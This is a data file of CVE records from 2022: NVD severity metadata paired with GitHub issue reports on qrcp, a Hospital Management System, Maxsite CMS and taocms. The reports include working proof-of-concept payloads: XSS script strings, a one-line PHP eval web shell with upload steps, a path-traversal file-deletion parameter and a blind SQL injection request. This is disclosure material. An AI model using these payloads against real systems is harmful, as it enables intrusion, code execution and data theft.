While qrcp works on receive mode, uploader can edit the file name in HTTP request and add "../". Meanwhile, qrcp doesn't check legality of file name which lead to directory traversal. Env: qrcp-0.8.4, Windows 10 x86_64, Ubuntu 20.04 x86_64 Poc: <img width="952" alt="image" src="https://user-images.githubusercontent.com/69268043/156000336-2b3019b6-4cdb-40ed-a305-4e48bf3628e9.png"> <img width="1067" alt="image" src="https://user-images.githubusercontent.com/69268043/156000944-8e1ab6e9-cbdd-42b2-8af2-839a5aff3036.png"> <img width="971" alt="image" src="https://user-images.githubusercontent.com/69268043/156001182-98f2a234-a91e-4e34-b8aa-57d9082051c2.png"> credit: starryloki,lu0sf
Directory Traversal Vulnerability
https://api.github.com/repos/claudiodangelis/qrcp/issues/223/comments
2
2022-02-28T14:59:45Z
2022-03-05T03:57:24Z
https://github.com/claudiodangelis/qrcp/issues/223
1,154,193,943
223
3,255
CVE-2022-25407
2022-02-28T23:15:12.647
Hospital Management System v1.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Doctor parameter at /admin-panel1.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/21" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "36653204-5E38-44E3-B8FD-580F2D27E958", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/kishan0725/Hospital-Management-System/issues/21
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kishan0725", "Hospital-Management-System" ]
Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: `<sCrIpT>alert(1234)</ScRiPt>` Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: `<sCrIpT>alert(1234)</ScRiPt>` ![xss-1](https://user-images.githubusercontent.com/95869214/153761354-eaff36cc-c182-4e08-babc-7ac0b7516741.png) ![xss-2](https://user-images.githubusercontent.com/95869214/153761371-1f180369-651b-4a8a-8ca6-3263a11f4e3b.png) Proof of concept (Poc): <sCrIpT>alert(1234)</ScRiPt>
Persistent cross-site scripting (XSS) in targeted towards web admin through /admin-panel1.php at via the parameter doctor.
https://api.github.com/repos/kishan0725/Hospital-Management-System/issues/21/comments
0
2022-02-13T15:55:55Z
2022-02-13T15:55:55Z
https://github.com/kishan0725/Hospital-Management-System/issues/21
1,136,052,127
21
3,256
CVE-2022-25408
2022-02-28T23:15:12.687
Hospital Management System v1.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the dpassword parameter at /admin-panel1.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/22" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "36653204-5E38-44E3-B8FD-580F2D27E958", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/kishan0725/Hospital-Management-System/issues/22
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kishan0725", "Hospital-Management-System" ]
Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'dpassword' parameter to xss payload: `<sCrIpT>alert(7777)</ScRiPt>` Steps to exploit: 1) Navigate to http://hospital.com/admin-panel1.php 2) click 'Add Doctors ', use burpsuite to insert xss payload in the "dpassword" parameter 3) Click "Add Doctors" ![passwd-xss](https://user-images.githubusercontent.com/95869214/153761417-41c5e704-17cc-4eca-a70c-7d52ef8c6e22.png) ![passwd-2-xss](https://user-images.githubusercontent.com/95869214/153761421-6a7fbcad-d341-495a-985f-90c36bcb8551.png) Proof of concept (Poc): <sCrIpT>alert(7777)</ScRiPt>
Persistent cross-site scripting (XSS) in targeted towards web admin through /admin-panel1.php at via the parameter dpassword.
https://api.github.com/repos/kishan0725/Hospital-Management-System/issues/22/comments
0
2022-02-13T15:57:12Z
2022-02-13T15:58:44Z
https://github.com/kishan0725/Hospital-Management-System/issues/22
1,136,053,859
22
3,257
CVE-2022-25409
2022-02-28T23:15:12.727
Hospital Management System v1.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the demail parameter at /admin-panel1.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/20" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "36653204-5E38-44E3-B8FD-580F2D27E958", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/kishan0725/Hospital-Management-System/issues/20
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kishan0725", "Hospital-Management-System" ]
Persistent cross-site scripting (XSS) in Hospital Management System v4.0 targeted towards web admin through /admin-panel1.php at via the parameter demail. Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'demail' parameter to xss payload: `<sCrIpT>alert(5555)</ScRiPt>` ![mail-xss](https://user-images.githubusercontent.com/95869214/153761272-6ddd3de2-c654-480f-871d-2f4d00228ba1.png) ![xss-2](https://user-images.githubusercontent.com/95869214/153761313-d4504144-86d5-4b7f-b2e4-342b7c4ca6a7.png) Proof of concept (Poc) <sCrIpT>alert(5555)</ScRiPt>
Persistent cross-site scripting (XSS) targeted towards web admin through /admin-panel1.php at via the parameter demail.
https://api.github.com/repos/kishan0725/Hospital-Management-System/issues/20/comments
0
2022-02-13T15:53:58Z
2022-02-13T15:53:58Z
https://github.com/kishan0725/Hospital-Management-System/issues/20
1,136,049,571
20
3,258
CVE-2022-25410
2022-02-28T23:15:12.767
Maxsite CMS v180 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the parameter f_file_description at /admin/files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/issues/485" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/issues/485" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:max-3000:maxsite_cms:108:*:*:*:*:*:*:*", "matchCriteriaId": "EC356198-5D41-4152-90E2-AED880BAB522", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/maxsite/cms/issues/485
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "maxsite", "cms" ]
### Stored-Cross-Site-Scripting (XSS) -2 a stored cross-site scripting (XSS) in maxsite cms targeted towards web admin through ~/admin/files at via the parameter f_file_description . 1. Navigate to admin page, go to http://localhost/admin/files,then update a xss.gif file ![image](https://user-images.githubusercontent.com/95869214/154520039-1b30f25c-ab55-4b38-8631-830893cf5d5e.png) 3. insert xss payload ` "><svg onload=alert(222)>` in the parameter f_file_description ![image](https://user-images.githubusercontent.com/95869214/154520277-d4bf0717-be5d-4212-bfb5-bca6da98b292.png) 4. click save You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up. ![image](https://user-images.githubusercontent.com/95869214/154520359-cca32818-ca09-4745-8a4d-39b27d8dd654.png)
Stored-Cross-Site-Scripting (XSS)(authenticated) --2
https://api.github.com/repos/maxsite/cms/issues/485/comments
1
2022-02-17T16:01:55Z
2022-02-17T16:20:15Z
https://github.com/maxsite/cms/issues/485
1,141,533,236
485
3,259
CVE-2022-25411
2022-02-28T23:15:12.810
A Remote Code Execution (RCE) vulnerability at /admin/options in Maxsite CMS v180 allows attackers to execute arbitrary code via a crafted PHP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/issues/487" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/issues/487" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:max-3000:maxsite_cms:108:*:*:*:*:*:*:*", "matchCriteriaId": "EC356198-5D41-4152-90E2-AED880BAB522", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/maxsite/cms/issues/487
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "maxsite", "cms" ]
### Description of Vulnerability The arbitrary file deletion vulnerability https://github.com/maxsite/cms/issues/486),we can delete ~/cms-108/uploads/.htaccess, and then in /admin/options add the types of files allowed to be uploaded, it will allows hacker to bypass the protection system protection upload malicious php files and execute malicious php code,eventually leading to a command execution vulnerability ### Proof of concept (Poc) 1. in ~t/admin/options#a-zagruzki add 'php' in "* Разрешенные типы файлов для загрузок" ![image](https://user-images.githubusercontent.com/95869214/154533642-60ffc5cd-f3f4-4c50-a989-efebfdc2851f.png) 2 . Use the method of https://github.com/maxsite/cms/issues/486 to delete ~/cms-108/uploads/.htaccess ![image](https://user-images.githubusercontent.com/95869214/154533897-0b9af405-7d90-4d56-a55b-ad97693d04c2.png) 3. upload php files whice containing malicious code: ``` <?php @eval($_GET['cmd']);?> ``` ![image](https://user-images.githubusercontent.com/95869214/154534748-96a5ca28-000a-4e1e-96b6-60fb101c83ea.png) 4. open the php file ~/uploads/cmd.php then rce ![image](https://user-images.githubusercontent.com/95869214/154534049-de4bf656-4923-479b-9819-ece86c3497d0.png)
Remote Code Execution Vulnerability In MaxSite CMS v180
https://api.github.com/repos/maxsite/cms/issues/487/comments
1
2022-02-17T17:15:18Z
2022-02-17T19:03:19Z
https://github.com/maxsite/cms/issues/487
1,141,623,090
487
3,260
CVE-2022-25412
2022-02-28T23:15:12.850
Maxsite CMS v180 was discovered to contain multiple arbitrary file deletion vulnerabilities in /admin_page/all-files-update-ajax.php via the dir and deletefile parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/issues/486" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/issues/486" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:max-3000:maxsite_cms:108:*:*:*:*:*:*:*", "matchCriteriaId": "EC356198-5D41-4152-90E2-AED880BAB522", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/maxsite/cms/issues/486
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "maxsite", "cms" ]
#### Description of Vulnerability Multiple Arbitrary File Deletion vulnerabilities in maxsite cms v 180 targeted towards web admin through admin/plugins/admin_page/all-files-update-ajax.php at the parameter dir and deletefile #### affected source code: at 15~34 in admin/plugins/admin_page/all-files-update-ajax.php ![image](https://user-images.githubusercontent.com/95869214/154530001-6fe62921-88d4-41e2-b6d0-261a3b6c041b.png) when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). #### Proof of concept (Poc) 1. in http://cms108.com/admin/page_edit/3 select file to delete and Send the request directly through burp ![image-20220216112514661](https://user-images.githubusercontent.com/95869214/154527950-1f72768e-2ce2-4ebd-b9e3-ffac8061ec90.png) ![image-20220216111841180](https://user-images.githubusercontent.com/95869214/154527978-c47b769c-5e38-450d-a36d-dd4fcb715356.png) 2. .You can traverse the directory to delete any file ![image-20220216112230772](https://user-images.githubusercontent.com/95869214/154528001-3cd15497-4c5e-4083-89db-98b8adfdd2f8.png) 3. (Poc) `dir=../&deletefile=del-test.php` #### Additional The same problem occurs in /cms-108/application/maxsite/admin/plugins/admin_files/admin.php at the parameter f_check_files
Multiple Arbitrary File Deletion vulnerabilities
https://api.github.com/repos/maxsite/cms/issues/486/comments
1
2022-02-17T16:55:54Z
2022-02-17T19:01:48Z
https://github.com/maxsite/cms/issues/486
1,141,600,693
486
3,261
CVE-2022-25413
2022-02-28T23:15:12.890
Maxsite CMS v108 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the parameter f_tags at /admin/page_edit/3.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/issues/484" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/issues/484" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:max-3000:maxsite_cms:108:*:*:*:*:*:*:*", "matchCriteriaId": "EC356198-5D41-4152-90E2-AED880BAB522", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/maxsite/cms/issues/484
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "maxsite", "cms" ]
### Stored-Cross-Site-Scripting (XSS)(authenticated) a stored cross-site scripting (XSS) in maxsite cms version 108 targeted towards web admin through ~/admin/page_edit/3 at via the parameter f_tags. 1. Navigate to admin page, ~/admin/page_edit/ and make a new page 2. click in "Рубрики и метки">"Метки (через запятую)" 3. insert xss payload ` "><svg onload=alert(1111)>` in the parameter f_tags ![image-20220216105554335](https://user-images.githubusercontent.com/95869214/154510691-40331c24-2962-4f73-b6c7-4d14cfc19df3.png) 4. click save You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up. ![image-20220216105633569](https://user-images.githubusercontent.com/95869214/154512167-67fd79c9-4bf5-4546-8b93-b7ea8cf0d24b.png) ![image-20220216105725390](https://user-images.githubusercontent.com/95869214/154512208-ed89ee86-7da2-41ac-b0df-9fb8f7a3fd36.png)
Stored-Cross-Site-Scripting (XSS)-vulnerabilities(authenticated)--1
https://api.github.com/repos/maxsite/cms/issues/484/comments
1
2022-02-17T15:24:21Z
2022-02-17T15:57:02Z
https://github.com/maxsite/cms/issues/484
1,141,483,156
484
3,262
CVE-2022-23380
2022-03-01T14:15:07.820
There is a SQL injection vulnerability in the background of taocms 3.0.2 in parameter id:action=admin&id=2&ctrl=edit.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/taogogo/taocms/issues/16
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
![20220116015744](https://user-images.githubusercontent.com/46486374/149633033-32c2dfd1-bc79-46a1-96c8-a05e1873985c.jpg) ![20220116015609](https://user-images.githubusercontent.com/46486374/149633040-9d78fd1a-3df2-4c0b-bc2b-71ea3aa5727e.jpg) ``` GET /admin/admin.php?action=admin&id=2+and(sleep(5))--+&ctrl=edit HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=aa3a5livo36mssl5dqhmf5dc62;XDEBUG_SESSION=PHPSTORM Connection: close ``` ![20220116020627](https://user-images.githubusercontent.com/46486374/149633051-7e0a3a1d-84e9-43d4-a47a-a0d587a13b0c.jpg) ![image](https://user-images.githubusercontent.com/46486374/149645874-a658cffe-7534-4efd-b92a-32c17a433a4e.png) admin/admin.php ![20220116015910](https://user-images.githubusercontent.com/46486374/149633072-7ada75c3-ae64-49da-b721-e6259a4bcc51.jpg) include/Model/Admin.php::edit ![20220116015937](https://user-images.githubusercontent.com/46486374/149633100-66c4a4bd-7b97-418c-a846-2b8a3513876d.jpg) include/Db/Mysql.php::getlist ![20220116020018](https://user-images.githubusercontent.com/46486374/149633117-5ecd1062-3ea5-472f-ad1b-524d6b6a4a88.jpg) include/Db/Mysql.php::query ![20220116020037](https://user-images.githubusercontent.com/46486374/149633125-1e4e24d9-d551-4a50-b9ca-0c4c314ffbb6.jpg)
There is SQL blind injection at "Admin Edit"
https://api.github.com/repos/taogogo/taocms/issues/16/comments
0
2022-01-15T18:16:58Z
2022-01-16T03:13:12Z
https://github.com/taogogo/taocms/issues/16
1,104,805,848
16
3,263
CVE-2022-23387
2022-03-01T17:15:08.120
An issue was discovered in taocms 3.0.2. This is a SQL blind injection that can obtain database data through the Comment Update field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
